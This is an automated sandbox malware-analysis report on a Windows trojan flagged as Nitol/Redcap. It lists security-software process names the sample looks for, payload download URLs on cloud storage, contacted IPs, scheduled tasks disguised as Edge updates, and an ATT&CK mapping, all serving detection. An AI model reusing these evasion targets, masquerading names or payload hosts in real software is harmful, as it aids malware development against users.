Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: 360Safe.exe
Source: mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: mcshield.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ashDisp.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 360Tray.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: avgwdsvc.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AYAgent.aye
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe
Source: mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Mcshield.exe
Source: WchJz1.exe, 00000004.00000002.2135734944.00000000027F8000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2947950767.0000000002D3D000.00000002.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

Yara detected Nitol

Source: Yara match	File source: 39.2.mm3ujg.exe.34d03e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.mm3ujg.exe.34d03e8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.mm3ujg.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mm3ujg.exe PID: 2688, type: MEMORYSTR

Remote Access Functionality

Yara detected Nitol

Source: Yara match	File source: 39.2.mm3ujg.exe.34d03e8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.mm3ujg.exe.34d03e8.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.mm3ujg.exe.10000000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mm3ujg.exe PID: 2688, type: MEMORYSTR

Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_00000001400042B0 EnterCriticalSection,CancelWaitableTimer,SetEvent,WaitForSingleObject,TerminateThread,CloseHandle,CloseHandle,CloseHandle,RpcServerUnregisterIf,RpcMgmtStopServerListening,EnterCriticalSection,LeaveCriticalSection,DeleteCriticalSection,#4,#4,#4,LeaveCriticalSection,DeleteCriticalSection,#4,		4_2_00000001400042B0
Source: C:\Users\user\Documents\WchJz1.exe	Code function: 4_2_0000000140003F80 InitializeCriticalSection,#4,#4,GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,EnterCriticalSection,LeaveCriticalSection,GetVersionExW,RpcSsDontSerializeContext,RpcServerUseProtseqEpW,RpcServerRegisterIfEx,RpcServerListen,CreateWaitableTimerW,CreateEventW,SetWaitableTimer,		4_2_0000000140003F80

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	113 Command and Scripting Interpreter	33 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	LSASS Memory	4 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	223 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	12 Service Execution	1 Registry Run Keys / Startup Folder	33 Windows Service	1 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Process Injection	1 DLL Side-Loading	LSA Secrets	331 Security Software Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	32 Masquerading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	1 Modify Registry	DCSync	11 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	18%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\mm3ujg\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\rXFCwD1I\tbcore3U.dll	100%	Avira	TR/Redcap.vdzex
C:\Program Files (x86)\mm3ujg\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\rXFCwD1I\tbcore3U.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\mm3ujg\mm3ujg.exe	0%	ReversingLabs
C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe	0%	ReversingLabs
C:\Users\user\Documents\WchJz1.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://jx2zg4.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgU~	0%	Avira URL Cloud	safe
https://jx2zg4.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
http://%s/%d.dll	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgalFilenameCmd.Exej%	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgom	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002.	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002~	0%	Avira URL Cloud	safe
http://%s/%d.dllC:	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgy	0%	Avira URL Cloud	safe
https://jx2zg4.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
http://%s/ip.txtC:	0%	Avira URL Cloud	safe
https://jx2zg4.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgD	0%	Avira URL Cloud	safe
http://%s/upx.rarC:	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/N	0%	Avira URL Cloud	safe
https://jx2zg4.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	0%	Avira URL Cloud	safe
https://jx2zg4.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
http://%s/ip.txt	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/	0%	Avira URL Cloud	safe
http://%s/upx.rar	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1002	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgh	0%	Avira URL Cloud	safe
https://jx2zg4.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/V	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgT	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	0%	Avira URL Cloud	safe
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgndows	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	118.178.60.9	true	false	unknown
sc-21lo.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.20	true	false	high
lisyrf.net	unknown	unknown	false	unknown
jx2zg4.oss-cn-beijing.aliyuncs.com	unknown	unknown	false	unknown
22mm.oss-cn-hangzhou.aliyuncs.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://jx2zg4.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg	false	Avira URL Cloud: safe	unknown
https://jx2zg4.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://jx2zg4.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown
https://jx2zg4.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg	false	Avira URL Cloud: safe	unknown
https://jx2zg4.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://jx2zg4.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg	false	Avira URL Cloud: safe	unknown
https://jx2zg4.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgU~	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002.	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgom	WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dll	mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, WchJz1.exe.0.dr	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgalFilenameCmd.Exej%	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/%d.dllC:	mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/1-2246122658-3693405117-2476756634-1002~	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgy	WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	false		high
http://%s/upx.rarC:	mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgD	WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txtC:	mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, WchJz1.exe.0.dr	false		high
https://22mm.oss-cn-hangzhou.aliyuncs.com/N	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937667938.0000000002B0D000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937897930.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, 00000000.00000003.1937868311.0000000002B2E000.00000004.00000020.00020000.00000000.sdmp, WchJz1.exe.0.dr	false		high
http://%s/ip.txt	mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1002	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rar	mm3ujg.exe, mm3ujg.exe, 00000027.00000002.2949564423.000000001002D000.00000004.00001000.00020000.00000000.sdmp, mm3ujg.exe, 00000027.00000002.2948433188.00000000034D0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgh	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/V	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgT	WchJz1.exe, 00000005.00000003.2435977752.000000000053E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgndows	WchJz1.exe, 00000005.00000003.2435977752.000000000050A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
8.212.102.187	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true
39.103.20.20	sc-21lo.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580438
Start date and time:	2024-12-24 15:11:06 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe renamed because original name is a hash value
Original Sample Name:	T11.0.2.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@66/30@6/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 58% Number of executed functions: 12 Number of non-executed functions: 111
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mm3ujg.exe, PID 2688 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe

Simulations

Behavior and APIs

Time	Type	Description
09:12:03	API Interceptor	4x Sleep call for process: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe modified
09:13:30	API Interceptor	842x Sleep call for process: WchJz1.exe modified
09:13:44	API Interceptor	319x Sleep call for process: mm3ujg.exe modified
14:12:45	Task Scheduler	Run new task: YqPAH path: C:\Users\user\Documents\WchJz1.exe
14:13:46	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 0nlst path: C:\Program Files (x86)\mm3ujg\mm3ujg.exe
14:13:46	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 ZuqIs path: C:\Program Files (x86)\rXFCwD1I\nbq99ChWh.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	armv6l.elf	Get hash	malicious	Unknown	Browse	8.136.162.222
	nabspc.elf	Get hash	malicious	Unknown	Browse	47.97.222.134
	splarm.elf	Get hash	malicious	Unknown	Browse	106.14.27.98
	jklm68k.elf	Get hash	malicious	Unknown	Browse	8.175.178.45
	nklspc.elf	Get hash	malicious	Unknown	Browse	8.186.115.130
	nabx86.elf	Get hash	malicious	Unknown	Browse	223.7.106.143
	nabppc.elf	Get hash	malicious	Unknown	Browse	39.102.151.201
	splmpsl.elf	Get hash	malicious	Unknown	Browse	47.115.224.209
	splppc.elf	Get hash	malicious	Unknown	Browse	47.114.228.120
	nklmips.elf	Get hash	malicious	Unknown	Browse	8.159.62.3
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	splarm7.elf	Get hash	malicious	Unknown	Browse	47.253.191.95
	nabsh4.elf	Get hash	malicious	Unknown	Browse	47.240.78.242
	splppc.elf	Get hash	malicious	Unknown	Browse	47.52.40.232
	arm.elf	Get hash	malicious	Unknown	Browse	8.208.49.9
	splx86.elf	Get hash	malicious	Unknown	Browse	47.241.90.97
	armv4l.elf	Get hash	malicious	Unknown	Browse	8.222.176.99
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	8.213.107.220
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	47.75.69.55
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	47.90.18.37
	arm5.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	8.220.243.205
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	armv6l.elf	Get hash	malicious	Unknown	Browse	8.136.162.222
	nabspc.elf	Get hash	malicious	Unknown	Browse	47.97.222.134
	splarm.elf	Get hash	malicious	Unknown	Browse	106.14.27.98
	jklm68k.elf	Get hash	malicious	Unknown	Browse	8.175.178.45
	nklspc.elf	Get hash	malicious	Unknown	Browse	8.186.115.130
	nabx86.elf	Get hash	malicious	Unknown	Browse	223.7.106.143
	nabppc.elf	Get hash	malicious	Unknown	Browse	39.102.151.201
	splmpsl.elf	Get hash	malicious	Unknown	Browse	47.115.224.209
	splppc.elf	Get hash	malicious	Unknown	Browse	47.114.228.120
	nklmips.elf	Get hash	malicious	Unknown	Browse	8.159.62.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Canvas of Kings_N6xC-S2.exe	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.20
	Technonomic.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	118.178.60.9 39.103.20.20
	installer.msi	Get hash	malicious	Unknown	Browse	118.178.60.9 39.103.20.20
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	118.178.60.9 39.103.20.20
